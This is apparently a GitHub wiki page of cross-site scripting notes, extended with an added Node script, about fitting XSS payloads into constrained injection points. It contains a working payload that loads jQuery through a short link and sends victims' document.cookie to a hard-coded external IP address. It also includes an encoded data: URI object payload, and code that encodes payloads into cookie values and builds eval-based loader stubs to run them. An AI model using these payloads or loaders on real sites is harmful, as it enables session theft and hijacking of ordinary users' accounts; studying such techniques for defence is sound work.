Wil Koch edited this page May 25, 2015 · 17 revisions
- Need an automated way to determine the constraints of an injection point (which characters it accepts, how long the value may be)
- Need a method that takes (payload, constraints) and generates the XSS injection that satisfies them
#Examples
Use a jQuery AJAX GET request to send the cookies to a collecting server. The first script tag loads jQuery through the goo.gl short link (see #Jquery below); `$.get` then sends `document.cookie` as the `cookies` query parameter. The page calls the target a CORS-configured server, but a simple cross-origin GET like this one is sent without a preflight and reaches the server whether or not it sends CORS headers; CORS only decides whether the script may read the response, which the exfiltration never needs.

```html
<script src='http://goo.gl/8LXprn'></script><script>$.get('http://52.13.21.28', {cookies:document.cookie})</script>
```
The data: URI of an object element can carry encoded JavaScript or HTML, but script running inside it cannot read the embedding page's cookies: a data: document gets its own opaque origin, so `document.cookie` there is empty. The payload below is `<script>a</script>`, percent-encoded byte by byte (%XX) and then encoded a second time (each % becomes %25) because the whole tag travels inside a URL parameter. `hex` is not a data: URI encoding defined by RFC 2397; the standard forms are plain percent-encoding after the comma or `;base64`.

```html
<object data="data:text/html;hex,%253c%2573%2563%2572%2569%2570%2574%253e%2561%253c%252f%2573%2563%2572%2569%2570%2574%253e"></object>
```
#Jquery
jQuery 1.11.2 from the Google CDN:

```html
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js"></script>
```

Short link used in the payload above (shorter to fit a constrained injection point):

http://goo.gl/8LXprn
In Python, to URI-decode a payload:

```python
# Python 3; the page's original snippet was Python 2: urllib.unquote(s).decode('utf8')
from urllib.parse import unquote

# one round of %XX decoding; apply it twice to the doubly encoded object payload above
print(unquote(unquote('%253c%2573%2563%2572%2569%2570%2574%253e')))  # <script>
```
#Characters in cookies
###Include
The RFC 6265 cookie-octet set, i.e. the characters a cookie value may contain:

```
0x21:    !
0x23-2B: #$%&'()*+
0x2D-3A: -./0123456789:
0x3C-5B: <=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[
0x5D-7E: ]^_`abcdefghijklmnopqrstuvwxyz{|}~
```
###Exclude
CTLs (0x00-1F and 0x7F), whitespace (0x20), DQUOTE (0x22), comma (0x2C), semicolon (0x3B) and backslash (0x5C). RFC 6265 defines cookie-octet as US-ASCII minus exactly these characters, which yields the Include ranges above. A typical JavaScript payload contains spaces, commas or double quotes, so it has to be encoded before it can be stored in a cookie value.
#Cookie Injection
##Base 64
Base64 output uses only A-Z, a-z, 0-9, +, / and =, all of them cookie-octets, so a base64-encoded payload fits in a cookie value unchanged; the on-page stub decodes it with `atob()` before passing it to `eval()`.
##URI coding
Percent-encoded output (%XX sequences plus the characters `encodeURIComponent` leaves unescaped: letters, digits and `-_.!~*'()`) is likewise made up of cookie-octets only. The stub that runs the cookie contents takes the percent-encoded payload read from the injected cookie value as its argument:

```javascript
eval(decodeURIComponent(/* percent-encoded payload read from the cookie */))
```
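A worked version of the (payload, constraints) idea from the top of the page, applied to the cookie channel described in the two sections above. This is an added example, not code from the wiki: it checks a payload against the RFC 6265 cookie-octet ranges, encodes it with percent-encoding or base64 so that every character is allowed, builds the short `eval(...)` stub that reads and decodes the cookie in the browser, and verifies in Node that the stub's decoding recovers the original. The function names, the cookie name `x` and the surrounding sample `Cookie` header are this example's own choices; the sample payload is the page's jQuery exfiltration call.

```javascript
// Added example (not part of the original page). Runs under Node; Buffer is a
// Node global. Cookie name "x", the sample Cookie header and all function
// names are assumptions made here.

// RFC 6265 cookie-octet: %x21 / %x23-2B / %x2D-3A / %x3C-5B / %x5D-7E
function isCookieOctet(ch) {
  const c = ch.charCodeAt(0);
  return c === 0x21 ||
    (c >= 0x23 && c <= 0x2b) ||
    (c >= 0x2d && c <= 0x3a) ||
    (c >= 0x3c && c <= 0x5b) ||
    (c >= 0x5d && c <= 0x7e);
}

// Characters of s that may not appear in a cookie value (unique, first-seen order).
function cookieViolations(s) {
  return [...new Set([...s].filter(ch => !isCookieOctet(ch)))];
}

// Encode a payload so that every character is a cookie-octet.
//   'uri'    -> percent-encoding, undone in the browser by decodeURIComponent()
//   'base64' -> base64, undone in the browser by atob()
function encodeForCookie(payload, mode) {
  if (mode === 'uri') return encodeURIComponent(payload);
  if (mode === 'base64') return Buffer.from(payload, 'utf8').toString('base64');
  throw new Error('unknown mode ' + mode);
}

// The short stub that must fit in the injection point: it reads cookie `name`
// from document.cookie, decodes it and evaluates the result.
function loaderStub(name, mode) {
  const read = `document.cookie.match(/(?:^|; )${name}=([^;]*)/)[1]`;
  return mode === 'uri'
    ? `eval(decodeURIComponent(${read}))`
    : `eval(atob(${read}))`;
}

// Node-side replay of what the stub does: pick cookie `name` out of a Cookie
// header string and decode it. Returns null when the cookie is absent.
function recoverPayload(cookieHeader, name, mode) {
  const m = cookieHeader.match(new RegExp('(?:^|; )' + name + '=([^;]*)'));
  if (!m) return null;
  return mode === 'uri'
    ? decodeURIComponent(m[1])
    : Buffer.from(m[1], 'base64').toString('utf8');
}

// Sample payload: the page's jQuery exfiltration call. The comma and the space
// in it are not cookie-octets, so it cannot be stored in a cookie as-is.
const PAYLOAD = "$.get('http://52.13.21.28', {cookies:document.cookie})";

// Run both encodings and report, per mode, the encoded value, any remaining
// violations (expected: none), the browser stub, and whether decoding the
// constructed Cookie header gives the original payload back.
function demo() {
  const out = { rawViolations: cookieViolations(PAYLOAD) };
  for (const mode of ['uri', 'base64']) {
    const value = encodeForCookie(PAYLOAD, mode);
    const header = 'sid=abc123; x=' + value + '; lang=en';   // constructed sample
    out[mode] = {
      value,
      violations: cookieViolations(value),
      stub: loaderStub('x', mode),
      roundTrip: recoverPayload(header, 'x', mode) === PAYLOAD,
    };
  }
  return out;
}

console.log(JSON.stringify(demo(), null, 2));
```

The stub is what has to survive the injection point's own filter; the bulk of the payload only has to survive the cookie grammar, which is why checking the encoded value against `cookieViolations` is the test that matters. Percent-encoding is the shorter stub (`decodeURIComponent` needs no extra call) but inflates the value more; base64 is denser but adds the `atob` call. Neither encoding touches `=` in a way that breaks the `name=value` split, because the first `=` after the cookie name is the separator and `[^;]*` takes everything up to the next semicolon.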
#References